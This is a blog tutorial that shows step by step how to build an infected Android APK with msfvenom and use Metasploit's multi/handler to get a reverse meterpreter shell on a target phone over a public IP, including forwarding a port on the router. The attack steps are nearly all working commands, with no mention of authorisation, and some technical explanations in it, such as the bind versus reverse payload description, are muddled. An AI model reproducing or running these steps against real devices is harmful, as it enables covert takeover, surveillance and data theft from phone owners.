How to Gain Remote Access To an Android with Metasploit (Public IP)

by hash3liZer . 12 April 2018

How to Gain Remote Access To an Android with Metasploit (Public IP)

The usage statistics of the android platform has been significantly increased over the last decade and it's rather crucial to discuss how well it have passed the stages of security in terms of trojans and the most competing viruses of today.

Just as the windows platform can be compromised if necessary precautions are not taken, the same could be said for the android. Over the years various practices have been taken into account to circumvent these security policies of android platform and metasploit being one of those.

Metasploit

An exceptional powerful tool named metasploit is basically a tool written in ruby and is quite handy at being used as a secondary command line interface. It provide access to diverse modules, each with an intended task to perform, and are further categorized into sub-modules.

Metasploit is famous among the researchers because of it's handy interface and the large database of exploits that it offers.

Everyday or week, when a new severe vulnerability gets discovered, the developers of metasploit would publish it publicly on the ExploitDB platform. Read more about gaining access to multiple platforms with shellpop:

Setup a remote Backdoor on Windows/Linux for system access.

Anti-Virus Softwares and the Firewalls are very well acquainted with metasploit payload signatures and how it obfuscates the payload which is to gain the backdoor access.

So, the AV detects the virus and move it away instead of letting it execute. Hence, being a strong guarding agent in the way of metasploit.

Let's see how we can gain access to an android smartphone with metasploit:

STEP 1

Preparing Metasploit

Open the console (terminal). Check the weekly updates and make changes to metasploit if necessary or if any new modules are detected. Doing so will keep you informed of newly added modules and exploits. 

apt install metasploit-framework

After that, start postgresql database service. Metasploit uses postgresql as the storage database. This will enable us to quickly navigate and search through metasploit modules, preventing the slow search issue that wastes time while systematizing the output.

systemctl enable postgresql
systemctl start postgresql

Enabling the postgresql will start it everytime the system boots. Now, there's no need to perform this step, next time, metasploit is going to flash.

Type msfconsole in terminal and press [Enter]. It will take a few seconds to bring the interface up to its fully functional state.

msfconsole

msfconsole

STEP 2

Choose the exploit

Search for an appropriate exploit for target OS using search command. Our target is an android smartphone. So, the query for an Android could be like:

search type:exploit platform:android

It will list the exploits available for android platform. You can get help on metasploit commands by typing help followed by a space with command name such as help search. It will print the manual for search command. Here's the output for android exploit search:

exploits

From the given list of exploits as shown in the image, we will use the generic exploit as highlighted. Now, to use the exploit, enter this command:

use exploit/multi/handler

use exploit/multi/handler

There is a set of payloads given for every single exploit. These payloads are actually the exploit modules that provides a backbone environment for transferring and executing commands on target window. Different payloads are used according to the given scenario and by guessing how much working space of target is required. Well, to show the payloads given for an exploit. Type in:

show payloads

show payloads

From the given set of payloads, we will use android/meterpreter/reverse_tcp. It's a great versatile payload to get started with. It will bring us a meterpreter session if payload executes unspotted. This meterpreter payload presents a handful list of directives which are useful enough to wholly compromise the target system.

At this point we need to know the basic difference between reverse and bind payloads. Bind payload will let you open a connection on the target system while the reverse payload would open a listening connection on the target machine, making it the host.

For the quick info, bind payloads are more useful when the target is a server or a device which is directly connected to internet and have a static IP. Reverse payloads are rather more adopted because of the nature of it's working.

Because most of the computers are behind NAT on the internet, it's most likely that the bind payload is not going to work in this situation. Set the payload :

set PAYLOAD android/meterpreter/reverse_tcp

STEP 3

Set Options

Attain the information of exploit using info command. This is the key step to get an idea, how actually the exploit works. It will give you the background information like what could be the possible targets and what the core of vulnerability is.

info

info

At this point, we know the working of exploit. Now, we have to setup the options for our exploit which are LHOST for local address of attacker and LPORT for the local port to use. To find local IP address type.

ip route

ip route

So, my local IP is 192.168.1.10. Set LHOST and LPORT

set LHOST 192.168.1.10
set LPORT 777         # Port for establishing connections

Make sure that both of the paramters are correctly modified.

show options

show options

STEP 4

Run the Exploit

Run the exploit as a job. The exploit will execute in the background and will notify you whenever the payload executes on the target system. Afterward, we will use sessions command to launch (target) session.

exploit -j

exploit -j

STEP 5

IP Forwarding

Find the Gateway IP of your Network and navigate to that IP through a web browser and login. Type:

route -n

route -n

Now, open a web browser and login to Router administrative Page.

logging into router

After successful login, enable the port 777 so that firewall allows the client and attacker machines to forward and receive traffic. You probably don't know how to forward a port on your router. For doing so, go to PortForward.com, search for your router company and model and follow the instructions for your router.

STEP 6

Generate (Infected) Application

For generating the infected (payload) application with extension .apk, we will use msfvenom, native payload generator of Metasploit framework. Open a new console (terminal) and generate a Simple Payload Application for android.

msfvenom -p android/meterpreter/reverse_tcp --platform android -o /root/Desktop/application.apk LHOST=Public IP Address (attacker) LPORT=777

msfvenom

PARAMETER BREAKDOWN

  • -p: payload to use
  • --platform: Target Platform
  • -o: Path to place the infected file
  • LHOST: Public IP of attacker (local) Machine
  • LPORT: Public Port of attacker (local) Machine

STEP 7

Own the target

Now, as soon the spawned apk file will be installed on an android Operating System (target). Metasploit terminal which we have left open will bring us a live target session. List the available sessions:

sessions -l

Now, to interact with a session. Just type in the session identifier (ID) after the sessions directive. It will take you to the meterpreter shell.

sessions [n]      # [n] is the ID of available sessions

sessions 2

Meterpreter session will be launched. Type help command. It will list a handful of commands from getting system info to starting live Chat.

meterpreter > help

Ignore meterpreter > . Its just there to indicate that its a meteterpreter session.

Lets try the shell command. It will bring us the terminal or cmd (if windows) of target system. Try to execute a command.

meterpreter > shell

shell

Conclusion

Android is the most widely adopted Operating System, making it the most famous platform even decisivly leaving windows behind and on the verge of security policies. Just like other platforms, android can be compromised with a few considerations in mind and metasploit can help us being one of those. However, one moust note that the security in terms of android as compared to windows is usually considered more secure and liable to rely on.